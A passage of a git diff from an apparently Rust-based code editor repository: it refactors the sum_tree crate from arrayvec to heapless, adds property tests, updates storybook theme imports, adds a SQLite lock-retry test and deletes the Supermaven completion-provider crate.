ThreadSafeConnection::builder::("wild_zed_lost_failure", false) - .with_connection_initialize_query("PRAGMA FOREIGN_KEYS=true"); - - smol::block_on(builder.build()).unwrap(); + fn connection_initialize_query_retries_transient_schema_lock() { + let name = "connection_initialize_query_retries_transient_schema_lock"; + let locking_connection = crate::connection::Connection::open_memory(Some(name)); + locking_connection.exec("BEGIN IMMEDIATE").unwrap()().unwrap(); + locking_connection + .exec("CREATE TABLE test(col TEXT)") + .unwrap()() + .unwrap(); + + let releaser = thread::spawn(move || { + thread::sleep(Duration::from_millis(10)); + locking_connection.exec("ROLLBACK").unwrap()().unwrap(); + }); + + ThreadSafeConnection::create_connection(false, name, Some("PRAGMA FOREIGN_KEYS=true")); + releaser.join().unwrap(); } } diff --git a/crates/storybook/Cargo.toml b/crates/storybook/Cargo.toml index b1d512559526a00021f5339707c1e24a3110ff15..b641e5cbd8b5ce5e66f9fb082e74ea42124f8993 100644 --- a/crates/storybook/Cargo.toml +++ b/crates/storybook/Cargo.toml @@ -29,6 +29,7 @@ picker.workspace = true reqwest_client.workspace = true rust-embed.workspace = true settings.workspace = true +theme_settings.workspace = true simplelog.workspace = true story.workspace = true strum = { workspace = true, features = ["derive"] } diff --git a/crates/storybook/src/app_menus.rs b/crates/storybook/src/app_menus.rs index 4e84b4c85da8b7ce3d9227ae174f842b4b1f9ce4..c3045cf7999b851245a2f540c6318b7d0ef57b4f 100644 --- a/crates/storybook/src/app_menus.rs +++ b/crates/storybook/src/app_menus.rs @@ -3,8 +3,5 @@ use gpui::{Menu, MenuItem}; pub fn app_menus() -> Vec { use crate::actions::Quit; - vec![Menu { - name: "Storybook".into(), - items: vec![MenuItem::action("Quit", Quit)], - }] + vec![Menu::new("Storybook").items([MenuItem::action("Quit", Quit)])] } diff --git a/crates/storybook/src/storybook.rs b/crates/storybook/src/storybook.rs index b8f659146c29162c25b94ca65d05770b4c08921b..d3df9bbc3a078793ab8e00c71cd4cb5cb9810fa6 100644 --- a/crates/storybook/src/storybook.rs +++ b/crates/storybook/src/storybook.rs @@ -15,10 +15,10 @@ use gpui::{ }; use log::LevelFilter; use reqwest_client::ReqwestClient; -use settings::{KeymapFile, Settings}; +use settings::{KeymapFile, Settings as _}; use simplelog::SimpleLogger; use strum::IntoEnumIterator; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::prelude::*; use crate::app_menus::app_menus; @@ -76,13 +76,13 @@ fn main() { cx.set_http_client(Arc::new(http_client)); settings::init(cx); - theme::init(theme::LoadThemes::All(Box::new(Assets)), cx); + theme_settings::init(theme::LoadThemes::All(Box::new(Assets)), cx); let selector = story_selector; let mut theme_settings = ThemeSettings::get_global(cx).clone(); theme_settings.theme = - theme::ThemeSelection::Static(settings::ThemeName(theme_name.into())); + theme_settings::ThemeSelection::Static(settings::ThemeName(theme_name.into())); ThemeSettings::override_global(theme_settings, cx); editor::init(cx); @@ -98,7 +98,7 @@ fn main() { ..Default::default() }, move |window, cx| { - theme::setup_ui_font(window, cx); + theme_settings::setup_ui_font(window, cx); cx.new(|cx| StoryWrapper::new(selector.story(window, cx))) }, diff --git a/crates/sum_tree/Cargo.toml b/crates/sum_tree/Cargo.toml index 3e06ede162dad37f94017207ccbd6ee5c38f26a5..8392baa4678b1f635b1c6955fad50acd76576e86 100644 --- a/crates/sum_tree/Cargo.toml +++ b/crates/sum_tree/Cargo.toml @@ -14,16 +14,22 @@ path = "src/sum_tree.rs" doctest = false [dependencies] -arrayvec = "0.7.1" +heapless.workspace = true rayon.workspace = true log.workspace = true ztracing.workspace = true tracing.workspace = true +proptest = { workspace = true, optional = true } [dev-dependencies] ctor.workspace = true rand.workspace = true +proptest.workspace = true zlog.workspace = true + [package.metadata.cargo-machete] ignored = ["tracing"] + +[features] +test-support = ["proptest"] \ No newline at end of file diff --git a/crates/sum_tree/src/cursor.rs b/crates/sum_tree/src/cursor.rs index 494ecbe049993e58357cf5d5606ea8d6624126c4..ec2ded5fcfcdc8400607c64b79ef8712e84e26fc 100644 --- a/crates/sum_tree/src/cursor.rs +++ b/crates/sum_tree/src/cursor.rs @@ -1,5 +1,5 @@ use super::*; -use arrayvec::ArrayVec; +use heapless::Vec as ArrayVec; use std::{cmp::Ordering, mem, sync::Arc}; use ztracing::instrument; @@ -29,7 +29,7 @@ impl fmt::Debug for StackEntry<'_, T, D> { #[derive(Clone)] pub struct Cursor<'a, 'b, T: Item, D> { tree: &'a SumTree, - stack: ArrayVec, 16>, + stack: ArrayVec, 16, u8>, pub position: D, did_seek: bool, at_end: bool, @@ -53,7 +53,7 @@ where pub struct Iter<'a, T: Item> { tree: &'a SumTree, - stack: ArrayVec, 16>, + stack: ArrayVec, 16, u8>, } impl<'a, 'b, T, D> Cursor<'a, 'b, T, D> @@ -231,11 +231,13 @@ where self.position = D::zero(self.cx); self.at_end = self.tree.is_empty(); if !self.tree.is_empty() { - self.stack.push(StackEntry { - tree: self.tree, - index: self.tree.0.child_summaries().len() as u32, - position: D::from_summary(self.tree.summary(), self.cx), - }); + self.stack + .push(StackEntry { + tree: self.tree, + index: self.tree.0.child_summaries().len() as u32, + position: D::from_summary(self.tree.summary(), self.cx), + }) + .unwrap_oob(); } } @@ -267,11 +269,13 @@ where Node::Internal { child_trees, .. } => { if descending { let tree = &child_trees[entry.index()]; - self.stack.push(StackEntry { - position: D::zero(self.cx), - tree, - index: tree.0.child_summaries().len() as u32 - 1, - }) + self.stack + .push(StackEntry { + position: D::zero(self.cx), + tree, + index: tree.0.child_summaries().len() as u32 - 1, + }) + .unwrap_oob(); } } Node::Leaf { .. } => { @@ -297,11 +301,13 @@ where if self.stack.is_empty() { if !self.at_end { - self.stack.push(StackEntry { - tree: self.tree, - index: 0, - position: D::zero(self.cx), - }); + self.stack + .push(StackEntry { + tree: self.tree, + index: 0, + position: D::zero(self.cx), + }) + .unwrap_oob(); descend = true; } self.did_seek = true; @@ -361,11 +367,13 @@ where if let Some(subtree) = new_subtree { descend = true; - self.stack.push(StackEntry { - tree: subtree, - index: 0, - position: self.position.clone(), - }); + self.stack + .push(StackEntry { + tree: subtree, + index: 0, + position: self.position.clone(), + }) + .unwrap_oob(); } else { descend = false; self.stack.pop(); @@ -467,11 +475,13 @@ where if !self.did_seek { self.did_seek = true; - self.stack.push(StackEntry { - tree: self.tree, - index: 0, - position: D::zero(self.cx), - }); + self.stack + .push(StackEntry { + tree: self.tree, + index: 0, + position: D::zero(self.cx), + }) + .unwrap_oob(); } let mut ascending = false; @@ -503,11 +513,13 @@ where entry.index += 1; entry.position = self.position.clone(); } else { - self.stack.push(StackEntry { - tree: child_tree, - index: 0, - position: self.position.clone(), - }); + self.stack + .push(StackEntry { + tree: child_tree, + index: 0, + position: self.position.clone(), + }) + .unwrap_oob(); ascending = false; continue 'outer; } @@ -578,11 +590,13 @@ impl<'a, T: Item> Iterator for Iter<'a, T> { let mut descend = false; if self.stack.is_empty() { - self.stack.push(StackEntry { - tree: self.tree, - index: 0, - position: (), - }); + self.stack + .push(StackEntry { + tree: self.tree, + index: 0, + position: (), + }) + .unwrap_oob(); descend = true; } @@ -611,11 +625,13 @@ impl<'a, T: Item> Iterator for Iter<'a, T> { if let Some(subtree) = new_subtree { descend = true; - self.stack.push(StackEntry { - tree: subtree, - index: 0, - position: (), - }); + self.stack + .push(StackEntry { + tree: subtree, + index: 0, + position: (), + }) + .unwrap_oob(); } else { descend = false; self.stack.pop(); @@ -748,8 +764,8 @@ trait SeekAggregate<'a, T: Item> { struct SliceSeekAggregate { tree: SumTree, - leaf_items: ArrayVec, - leaf_item_summaries: ArrayVec, + leaf_items: ArrayVec, + leaf_item_summaries: ArrayVec, leaf_summary: T::Summary, } @@ -786,8 +802,8 @@ impl SeekAggregate<'_, T> for SliceSeekAggregate { summary: &T::Summary, cx: ::Context<'_>, ) { - self.leaf_items.push(item.clone()); - self.leaf_item_summaries.push(summary.clone()); + self.leaf_items.push(item.clone()).unwrap_oob(); + self.leaf_item_summaries.push(summary.clone()).unwrap_oob(); Summary::add_summary(&mut self.leaf_summary, summary, cx); } fn push_tree( diff --git a/crates/sum_tree/src/property_test.rs b/crates/sum_tree/src/property_test.rs new file mode 100644 index 0000000000000000000000000000000000000000..d6c6bd76f94704c60dfc6919fa02ba66c19f349d --- /dev/null +++ b/crates/sum_tree/src/property_test.rs @@ -0,0 +1,32 @@ +use core::fmt::Debug; + +use proptest::{prelude::*, sample::SizeRange}; + +use crate::{Item, SumTree, Summary}; + +impl Arbitrary for SumTree +where + T: Debug + Arbitrary + Item + 'static, + T::Summary: Debug + Summary = ()>, +{ + type Parameters = (); + type Strategy = BoxedStrategy; + + fn arbitrary_with((): Self::Parameters) -> Self::Strategy { + any::>() + .prop_map(|vec| SumTree::from_iter(vec, ())) + .boxed() + } +} + +/// A strategy for producing a [`SumTree`] with a given size. +/// +/// Equivalent to [`proptest::collection::vec`]. +pub fn sum_tree(values: S, size: impl Into) -> impl Strategy> +where + T: Debug + Arbitrary + Item + 'static, + T::Summary: Debug + Summary = ()>, + S: Strategy, +{ + proptest::collection::vec(values, size).prop_map(|vec| SumTree::from_iter(vec, ())) +} diff --git a/crates/sum_tree/src/sum_tree.rs b/crates/sum_tree/src/sum_tree.rs index fa83dd937489f0c52e6c02b83b52112b5ff52ec1..251a194d2c7c984a0caa4d0b478ece41332af6be 100644 --- a/crates/sum_tree/src/sum_tree.rs +++ b/crates/sum_tree/src/sum_tree.rs @@ -1,8 +1,10 @@ mod cursor; +#[cfg(any(test, feature = "test-support"))] +pub mod property_test; mod tree_map; -use arrayvec::ArrayVec; pub use cursor::{Cursor, FilterCursor, Iter}; +use heapless::Vec as ArrayVec; use rayon::iter::{IndexedParallelIterator, IntoParallelIterator, ParallelIterator as _}; use std::marker::PhantomData; use std::mem; @@ -15,6 +17,17 @@ pub const TREE_BASE: usize = 2; #[cfg(not(test))] pub const TREE_BASE: usize = 6; +// Helper for when we cannot use ArrayVec::::push().unwrap() as T doesn't impl Debug +trait CapacityResultExt { + fn unwrap_oob(self); +} + +impl CapacityResultExt for Result<(), T> { + fn unwrap_oob(self) { + self.unwrap_or_else(|_| panic!("item should fit into fixed size ArrayVec")) + } +} + /// An item that can be stored in a [`SumTree`] /// /// Must be summarized by a type that implements [`Summary`] @@ -241,8 +254,9 @@ impl SumTree { let mut iter = iter.into_iter().fuse().peekable(); while iter.peek().is_some() { - let items: ArrayVec = iter.by_ref().take(2 * TREE_BASE).collect(); - let item_summaries: ArrayVec = + let items: ArrayVec = + iter.by_ref().take(2 * TREE_BASE).collect(); + let item_summaries: ArrayVec = items.iter().map(|item| item.summary(cx)).collect(); let mut summary = item_summaries[0].clone(); @@ -282,8 +296,8 @@ impl SumTree { }; let child_summary = child_node.summary(); ::add_summary(summary, child_summary, cx); - child_summaries.push(child_summary.clone()); - child_trees.push(child_node); + child_summaries.push(child_summary.clone()).unwrap_oob(); + child_trees.push(child_node.clone()).unwrap_oob(); if child_trees.len() == 2 * TREE_BASE { parent_nodes.extend(current_parent_node.take()); @@ -313,8 +327,8 @@ impl SumTree { .into_par_iter() .chunks(2 * TREE_BASE) .map(|items| { - let items: ArrayVec = items.into_iter().collect(); - let item_summaries: ArrayVec = + let items: ArrayVec = items.into_iter().collect(); + let item_summaries: ArrayVec = items.iter().map(|item| item.summary(cx)).collect(); let mut summary = item_summaries[0].clone(); for item_summary in &item_summaries[1..] { @@ -335,9 +349,9 @@ impl SumTree { .into_par_iter() .chunks(2 * TREE_BASE) .map(|child_nodes| { - let child_trees: ArrayVec, { 2 * TREE_BASE }> = + let child_trees: ArrayVec, { 2 * TREE_BASE }, u8> = child_nodes.into_iter().collect(); - let child_summaries: ArrayVec = child_trees + let child_summaries: ArrayVec = child_trees .iter() .map(|child_tree| child_tree.summary().clone()) .collect(); @@ -661,6 +675,51 @@ impl SumTree { } } + pub fn update_first( + &mut self, + f: impl FnOnce(&mut T), + cx: ::Context<'_>, + ) { + self.update_first_recursive(f, cx); + } + + fn update_first_recursive( + &mut self, + f: impl FnOnce(&mut T), + cx: ::Context<'_>, + ) -> Option { + match Arc::make_mut(&mut self.0) { + Node::Internal { + summary, + child_summaries, + child_trees, + .. + } => { + let first_summary = child_summaries.first_mut().unwrap(); + let first_child = child_trees.first_mut().unwrap(); + *first_summary = first_child.update_first_recursive(f, cx).unwrap(); + *summary = sum(child_summaries.iter(), cx); + Some(summary.clone()) + } + Node::Leaf { + summary, + items, + item_summaries, + } => { + if let Some((item, item_summary)) = + items.first_mut().zip(item_summaries.first_mut()) + { + (f)(item); + *item_summary = item.summary(cx); + *summary = sum(item_summaries.iter(), cx); + Some(summary.clone()) + } else { + None + } + } + } + } + pub fn extent<'a, D: Dimension<'a, T::Summary>>( &'a self, cx: ::Context<'_>, @@ -751,14 +810,16 @@ impl SumTree { ::add_summary(summary, other_node.summary(), cx); let height_delta = *height - other_node.height(); - let mut summaries_to_append = ArrayVec::::new(); - let mut trees_to_append = ArrayVec::, { 2 * TREE_BASE }>::new(); + let mut summaries_to_append = ArrayVec::::new(); + let mut trees_to_append = ArrayVec::, { 2 * TREE_BASE }, u8>::new(); if height_delta == 0 { summaries_to_append.extend(other_node.child_summaries().iter().cloned()); trees_to_append.extend(other_node.child_trees().iter().cloned()); } else if height_delta == 1 && !other_node.is_underflowing() { - summaries_to_append.push(other_node.summary().clone()); - trees_to_append.push(other) + summaries_to_append + .push(other_node.summary().clone()) + .unwrap_oob(); + trees_to_append.push(other).unwrap_oob(); } else { let tree_to_append = child_trees .last_mut() @@ -768,15 +829,17 @@ impl SumTree { child_trees.last().unwrap().0.summary().clone(); if let Some(split_tree) = tree_to_append { - summaries_to_append.push(split_tree.0.summary().clone()); - trees_to_append.push(split_tree); + summaries_to_append + .push(split_tree.0.summary().clone()) + .unwrap_oob(); + trees_to_append.push(split_tree).unwrap_oob(); } } let child_count = child_trees.len() + trees_to_append.len(); if child_count > 2 * TREE_BASE { - let left_summaries: ArrayVec<_, { 2 * TREE_BASE }>; - let right_summaries: ArrayVec<_, { 2 * TREE_BASE }>; + let left_summaries: ArrayVec<_, { 2 * TREE_BASE }, u8>; + let right_summaries: ArrayVec<_, { 2 * TREE_BASE }, u8>; let left_trees; let right_trees; @@ -821,7 +884,7 @@ impl SumTree { let left_items; let right_items; let left_summaries; - let right_summaries: ArrayVec; + let right_summaries: ArrayVec; let midpoint = (child_count + child_count % 2) / 2; { @@ -886,8 +949,10 @@ impl SumTree { *child_summaries.first_mut().unwrap() = first.summary().clone(); if let Some(tree) = res { if child_trees.len() < 2 * TREE_BASE { - child_summaries.insert(0, tree.summary().clone()); - child_trees.insert(0, tree); + child_summaries + .insert(0, tree.summary().clone()) + .unwrap_oob(); + child_trees.insert(0, tree).unwrap_oob(); None } else { let new_child_summaries = { @@ -969,7 +1034,7 @@ impl SumTree { .iter() .chain(child_summaries.iter()) .cloned(); - let left_summaries: ArrayVec<_, { 2 * TREE_BASE }> = + let left_summaries: ArrayVec<_, { 2 * TREE_BASE }, u8> = all_summaries.by_ref().take(midpoint).collect(); *child_summaries = all_summaries.collect(); @@ -1018,7 +1083,7 @@ impl SumTree { .iter() .chain(item_summaries.iter()) .cloned(); - let left_summaries: ArrayVec<_, { 2 * TREE_BASE }> = + let left_summaries: ArrayVec<_, { 2 * TREE_BASE }, u8> = all_summaries.by_ref().take(midpoint).collect(); *item_summaries = all_summaries.collect(); @@ -1041,11 +1106,11 @@ impl SumTree { ) -> Self { let height = left.0.height() + 1; let mut child_summaries = ArrayVec::new(); - child_summaries.push(left.0.summary().clone()); - child_summaries.push(right.0.summary().clone()); + child_summaries.push(left.0.summary().clone()).unwrap_oob(); + child_summaries.push(right.0.summary().clone()).unwrap_oob(); let mut child_trees = ArrayVec::new(); - child_trees.push(left); - child_trees.push(right); + child_trees.push(left).unwrap_oob(); + child_trees.push(right).unwrap_oob(); SumTree(Arc::new(Node::Internal { height, summary: sum(child_summaries.iter(), cx), @@ -1205,13 +1270,13 @@ pub enum Node { Internal { height: u8, summary: T::Summary, - child_summaries: ArrayVec, - child_trees: ArrayVec, { 2 * TREE_BASE }>, + child_summaries: ArrayVec, + child_trees: ArrayVec, { 2 * TREE_BASE }, u8>, }, Leaf { summary: T::Summary, - items: ArrayVec, - item_summaries: ArrayVec, + items: ArrayVec, + item_summaries: ArrayVec, }, } @@ -1276,14 +1341,14 @@ impl Node { } } - fn child_trees(&self) -> &ArrayVec, { 2 * TREE_BASE }> { + fn child_trees(&self) -> &ArrayVec, { 2 * TREE_BASE }, u8> { match self { Node::Internal { child_trees, .. } => child_trees, Node::Leaf { .. } => panic!("Leaf nodes have no child trees"), } } - fn items(&self) -> &ArrayVec { + fn items(&self) -> &ArrayVec { match self { Node::Leaf { items, .. } => items, Node::Internal { .. } => panic!("Internal nodes have no items"), diff --git a/crates/sum_tree/src/tree_map.rs b/crates/sum_tree/src/tree_map.rs index e58f7a65dd5d13ca67d4433bd25118ffb55d1169..004ec918514e0ad18b3c1e55178a6527866d1bb1 100644 --- a/crates/sum_tree/src/tree_map.rs +++ b/crates/sum_tree/src/tree_map.rs @@ -53,6 +53,10 @@ impl TreeMap { self.0.is_empty() } + pub fn contains_key(&self, key: &K) -> bool { + self.get(key).is_some() + } + pub fn get(&self, key: &K) -> Option<&V> { let (.., item) = self .0 diff --git a/crates/supermaven/Cargo.toml b/crates/supermaven/Cargo.toml deleted file mode 100644 index c2d0c48a9e7733402eae32886c0863326882c134..0000000000000000000000000000000000000000 --- a/crates/supermaven/Cargo.toml +++ /dev/null @@ -1,44 +0,0 @@ -[package] -name = "supermaven" -version = "0.1.0" -edition.workspace = true -publish.workspace = true -license = "GPL-3.0-or-later" - -[lints] -workspace = true - -[lib] -path = "src/supermaven.rs" -doctest = false - -[dependencies] -anyhow.workspace = true -client.workspace = true -collections.workspace = true -edit_prediction_types.workspace = true -futures.workspace = true -gpui.workspace = true -language.workspace = true -log.workspace = true -postage.workspace = true -serde.workspace = true -serde_json.workspace = true -settings.workspace = true -smol.workspace = true -supermaven_api.workspace = true -text.workspace = true -ui.workspace = true -unicode-segmentation.workspace = true -util.workspace = true - -[dev-dependencies] -editor = { workspace = true, features = ["test-support"] } -env_logger.workspace = true -gpui = { workspace = true, features = ["test-support"] } -language = { workspace = true, features = ["test-support"] } -project = { workspace = true, features = ["test-support"] } -settings = { workspace = true, features = ["test-support"] } -theme = { workspace = true, features = ["test-support"] } -util = { workspace = true, features = ["test-support"] } -http_client = { workspace = true, features = ["test-support"] } diff --git a/crates/supermaven/src/messages.rs b/crates/supermaven/src/messages.rs deleted file mode 100644 index 9210343587bbb2cbf172a62a2eff73bbbb7cfb72..0000000000000000000000000000000000000000 --- a/crates/supermaven/src/messages.rs +++ /dev/null @@ -1,146 +0,0 @@ -use serde::{Deserialize, Serialize}; - -// Outbound messages -#[derive(Debug, Serialize)] -#[serde(tag = "kind", rename_all = "snake_case")] -pub enum OutboundMessage { - StateUpdate(StateUpdateMessage), - #[allow(dead_code)] - UseFreeVersion, - Logout, -} - -#[derive(Debug, Serialize, Deserialize)] -#[serde(rename_all = "camelCase")] -pub struct StateUpdateMessage { - pub new_id: String, - pub updates: Vec, -} - -#[derive(Debug, Serialize, Deserialize)] -#[serde(tag = "kind", rename_all = "snake_case")] -pub enum StateUpdate { - FileUpdate(FileUpdateMessage), - CursorUpdate(CursorPositionUpdateMessage), -} - -#[derive(Debug, Serialize, Deserialize)] -#[serde(rename_all = "snake_case")] -pub struct FileUpdateMessage { - pub path: String, - pub content: String, -} - -#[derive(Debug, Serialize, Deserialize)] -#[serde(rename_all = "snake_case")] -pub struct CursorPositionUpdateMessage { - pub path: String, - pub offset: usize, -} - -// Inbound messages coming in on stdout - -#[derive(Debug, Serialize, Deserialize)] -#[serde(tag = "kind", rename_all = "snake_case")] -pub enum ResponseItem { - // A completion - Text { text: String }, - // Vestigial message type from old versions -- safe to ignore - Del { text: String }, - // Be able to delete whitespace prior to the cursor, likely for the rest of the completion - Dedent { text: String }, - // When the completion is over - End, - // Got the closing parentheses and shouldn't show any more after - Barrier, -} - -#[derive(Debug, Serialize, Deserialize)] -#[serde(rename_all = "camelCase")] -pub struct SupermavenResponse { - pub state_id: String, - pub items: Vec, -} - -#[derive(Debug, Serialize, Deserialize)] -pub struct SupermavenMetadataMessage { - pub dust_strings: Option>, -} - -#[derive(Debug, Serialize, Deserialize)] -pub struct SupermavenTaskUpdateMessage { - pub task: String, - pub status: TaskStatus, - pub percent_complete: Option, -} - -#[derive(Debug, Serialize, Deserialize)] -#[serde(rename_all = "snake_case")] -pub enum TaskStatus { - InProgress, - Complete, -} - -#[derive(Debug, Serialize, Deserialize)] -pub struct SupermavenActiveRepoMessage { - pub repo_simple_name: Option, -} - -#[derive(Debug, Serialize, Deserialize)] -#[serde(tag = "kind", rename_all = "snake_case")] -pub enum SupermavenPopupAction { - OpenUrl { label: String, url: String }, - NoOp { label: String }, -} - -#[derive(Debug, Serialize, Deserialize)] -#[serde(rename_all = "snake_case")] -pub struct SupermavenPopupMessage { - pub message: String, - pub actions: Vec, -} - -#[derive(Debug, Serialize, Deserialize)] -#[serde(tag = "kind", rename_all = "camelCase")] -pub struct ActivationRequest { - pub activate_url: Option, -} - -#[derive(Debug, Serialize, Deserialize)] -#[serde(rename_all = "camelCase")] -pub struct SupermavenSetMessage { - pub key: String, - pub value: serde_json::Value, -} - -#[derive(Clone, Debug, Serialize, Deserialize)] -pub enum ServiceTier { - FreeNoLicense, - #[serde(other)] - Unknown, -} - -#[derive(Debug, Serialize, Deserialize)] -#[serde(tag = "kind", rename_all = "snake_case")] -pub enum SupermavenMessage { - Response(SupermavenResponse), - Metadata(SupermavenMetadataMessage), - Apology { - message: Option, - }, - ActivationRequest(ActivationRequest), - ActivationSuccess, - Passthrough { - passthrough: Box, - }, - Popup(SupermavenPopupMessage), - TaskStatus(SupermavenTaskUpdateMessage), - ActiveRepo(SupermavenActiveRepoMessage), - ServiceTier { - service_tier: ServiceTier, - }, - - Set(SupermavenSetMessage), - #[serde(other)] - Unknown, -} diff --git a/crates/supermaven/src/supermaven.rs b/crates/supermaven/src/supermaven.rs deleted file mode 100644 index 96f9b9c58bf934ae3991375ee8ef15cbf990dcc4..0000000000000000000000000000000000000000 --- a/crates/supermaven/src/supermaven.rs +++ /dev/null @@ -1,485 +0,0 @@ -mod messages; -mod supermaven_edit_prediction_delegate; - -pub use supermaven_edit_prediction_delegate::*; - -use anyhow::{Context as _, Result}; -#[allow(unused_imports)] -use client::{Client, proto}; -use collections::BTreeMap; - -use futures::{AsyncBufReadExt, StreamExt, channel::mpsc, io::BufReader}; -use gpui::{App, AsyncApp, Context, Entity, EntityId, Global, Task, WeakEntity, actions}; -use language::{ - Anchor, Buffer, BufferSnapshot, ToOffset, language_settings::all_language_settings, -}; -use messages::*; -use postage::watch; -use serde::{Deserialize, Serialize}; -use settings::SettingsStore; -use smol::io::AsyncWriteExt; -use std::{path::PathBuf, sync::Arc}; -use ui::prelude::*; -use util::ResultExt; -use util::command::Child; -use util::command::Stdio; - -actions!( - supermaven, - [ - /// Signs out of Supermaven. - SignOut - ] -); - -pub fn init(client: Arc, cx: &mut App) { - let supermaven = cx.new(|_| Supermaven::Starting); - Supermaven::set_global(supermaven.clone(), cx); - - let mut provider = all_language_settings(None, cx).edit_predictions.provider; - if provider == language::language_settings::EditPredictionProvider::Supermaven { - supermaven.update(cx, |supermaven, cx| supermaven.start(client.clone(), cx)); - } - - cx.observe_global::(move |cx| { - let new_provider = all_language_settings(None, cx).edit_predictions.provider; - if new_provider != provider { - provider = new_provider; - if provider == language::language_settings::EditPredictionProvider::Supermaven { - supermaven.update(cx, |supermaven, cx| supermaven.start(client.clone(), cx)); - } else { - supermaven.update(cx, |supermaven, _cx| supermaven.stop()); - } - } - }) - .detach(); - - cx.on_action(|_: &SignOut, cx| { - if let Some(supermaven) = Supermaven::global(cx) { - supermaven.update(cx, |supermaven, _cx| supermaven.sign_out()); - } - }); -} - -pub enum Supermaven { - Starting, - FailedDownload { error: anyhow::Error }, - Spawned(SupermavenAgent), - Error { error: anyhow::Error }, -} - -#[derive(Clone)] -pub enum AccountStatus { - Unknown, - NeedsActivation { activate_url: String }, - Ready, -} - -#[derive(Clone)] -struct SupermavenGlobal(Entity); - -impl Global for SupermavenGlobal {} - -impl Supermaven { - pub fn global(cx: &App) -> Option> { - cx.try_global::() - .map(|model| model.0.clone()) - } - - pub fn set_global(supermaven: Entity, cx: &mut App) { - cx.set_global(SupermavenGlobal(supermaven)); - } - - pub fn start(&mut self, client: Arc, cx: &mut Context) { - if let Self::Starting = self { - cx.spawn(async move |this, cx| { - let binary_path = - supermaven_api::get_supermaven_agent_path(client.http_client()).await?; - - this.update(cx, |this, cx| { - if let Self::Starting = this { - *this = - Self::Spawned(SupermavenAgent::new(binary_path, client.clone(), cx)?); - } - anyhow::Ok(()) - }) - }) - .detach_and_log_err(cx) - } - } - - pub fn stop(&mut self) { - *self = Self::Starting; - } - - pub fn is_enabled(&self) -> bool { - matches!(self, Self::Spawned { .. }) - } - - pub fn complete( - &mut self, - buffer: &Entity, - cursor_position: Anchor, - cx: &App, - ) -> Option { - if let Self::Spawned(agent) = self { - let buffer_id = buffer.entity_id(); - let buffer = buffer.read(cx); - let path = buffer - .file() - .and_then(|file| Some(file.as_local()?.abs_path(cx))) - .unwrap_or_else(|| PathBuf::from("untitled")) - .to_string_lossy() - .to_string(); - let content = buffer.text(); - let offset = cursor_position.to_offset(buffer); - let state_id = agent.next_state_id; - agent.next_state_id.0 += 1; - - let (updates_tx, mut updates_rx) = watch::channel(); - postage::stream::Stream::try_recv(&mut updates_rx).unwrap(); - - agent.states.insert( - state_id, - SupermavenCompletionState { - buffer_id, - prefix_anchor: cursor_position, - prefix_offset: offset, - text: String::new(), - dedent: String::new(), - updates_tx, - }, - ); - // ensure the states map is max 1000 elements - if agent.states.len() > 1000 { - // state id is monotonic so it's sufficient to remove the first element - agent - .states - .remove(&agent.states.keys().next().unwrap().clone()); - } - - let _ = agent - .outgoing_tx - .unbounded_send(OutboundMessage::StateUpdate(StateUpdateMessage { - new_id: state_id.0.to_string(), - updates: vec![ - StateUpdate::FileUpdate(FileUpdateMessage { - path: path.clone(), - content, - }), - StateUpdate::CursorUpdate(CursorPositionUpdateMessage { path, offset }), - ], - })); - - Some(SupermavenCompletion { - id: state_id, - updates: updates_rx, - }) - } else { - None - } - } - - pub fn completion( - &self, - buffer: &Entity, - cursor_position: Anchor, - cx: &App, - ) -> Option<&str> { - if let Self::Spawned(agent) = self { - find_relevant_completion( - &agent.states, - buffer.entity_id(), - &buffer.read(cx).snapshot(), - cursor_position, - ) - } else { - None - } - } - - pub fn sign_out(&mut self) { - if let Self::Spawned(agent) = self { - agent - .outgoing_tx - .unbounded_send(OutboundMessage::Logout) - .ok(); - // The account status will get set to RequiresActivation or Ready when the next - // message from the agent comes in. Until that happens, set the status to Unknown - // to disable the button. - agent.account_status = AccountStatus::Unknown; - } - } -} - -fn find_relevant_completion<'a>( - states: &'a BTreeMap, - buffer_id: EntityId, - buffer: &BufferSnapshot, - cursor_position: Anchor, -) -> Option<&'a str> { - let mut best_completion: Option<&str> = None; - 'completions: for state in states.values() { - if state.buffer_id != buffer_id { - continue; - } - let Some(state_completion) = state.text.strip_prefix(&state.dedent) else { - continue; - }; - - let current_cursor_offset = cursor_position.to_offset(buffer); - if current_cursor_offset < state.prefix_offset { - continue; - } - - let original_cursor_offset = buffer.clip_offset(state.prefix_offset, text::Bias::Left); - let text_inserted_since_completion_request: String = buffer - .text_for_range(original_cursor_offset..current_cursor_offset) - .collect(); - let trimmed_completion = - match state_completion.strip_prefix(&text_inserted_since_completion_request) { - Some(suffix) => suffix, - None => continue 'completions, - }; - - if best_completion.is_some_and(|best| best.len() > trimmed_completion.len()) { - continue; - } - - best_completion = Some(trimmed_completion); - } - best_completion -} - -pub struct SupermavenAgent { - _process: Child, - next_state_id: SupermavenCompletionStateId, - states: BTreeMap, - outgoing_tx: mpsc::UnboundedSender, - _handle_outgoing_messages: Task>, - _handle_incoming_messages: Task>, - pub account_status: AccountStatus, - service_tier: Option, - #[allow(dead_code)] - client: Arc, -} - -impl SupermavenAgent { - fn new( - binary_path: PathBuf, - client: Arc, - cx: &mut Context, - ) -> Result { - let mut process = util::command::new_command(&binary_path) - .arg("stdio") - .stdin(Stdio::piped()) - .stdout(Stdio::piped()) - .stderr(Stdio::piped()) - .kill_on_drop(true) - .spawn() - .context("failed to start the binary")?; - - let stdin = process - .stdin - .take() - .context("failed to get stdin for process")?; - let stdout = process - .stdout - .take() - .context("failed to get stdout for process")?; - - let (outgoing_tx, outgoing_rx) = mpsc::unbounded(); - - Ok(Self { - _process: process, - next_state_id: SupermavenCompletionStateId::default(), - states: BTreeMap::default(), - outgoing_tx, - _handle_outgoing_messages: cx.spawn(async move |_, _cx| { - Self::handle_outgoing_messages(outgoing_rx, stdin).await - }), - _handle_incoming_messages: cx.spawn(async move |this, cx| { - Self::handle_incoming_messages(this, stdout, cx).await - }), - account_status: AccountStatus::Unknown, - service_tier: None, - client, - }) - } - - async fn handle_outgoing_messages( - mut outgoing: mpsc::UnboundedReceiver, - mut stdin: W, - ) -> Result<()> { - while let Some(message) = outgoing.next().await { - let bytes = serde_json::to_vec(&message)?; - stdin.write_all(&bytes).await?; - stdin.write_all(&[b'\n']).await?; - } - Ok(()) - } - - async fn handle_incoming_messages( - this: WeakEntity, - stdout: R, - cx: &mut AsyncApp, - ) -> Result<()> { - const MESSAGE_PREFIX: &str = "SM-MESSAGE "; - - let stdout = BufReader::new(stdout); - let mut lines = stdout.lines(); - while let Some(line) = lines.next().await { - let Some(line) = line.context("failed to read line from stdout").log_err() else { - continue; 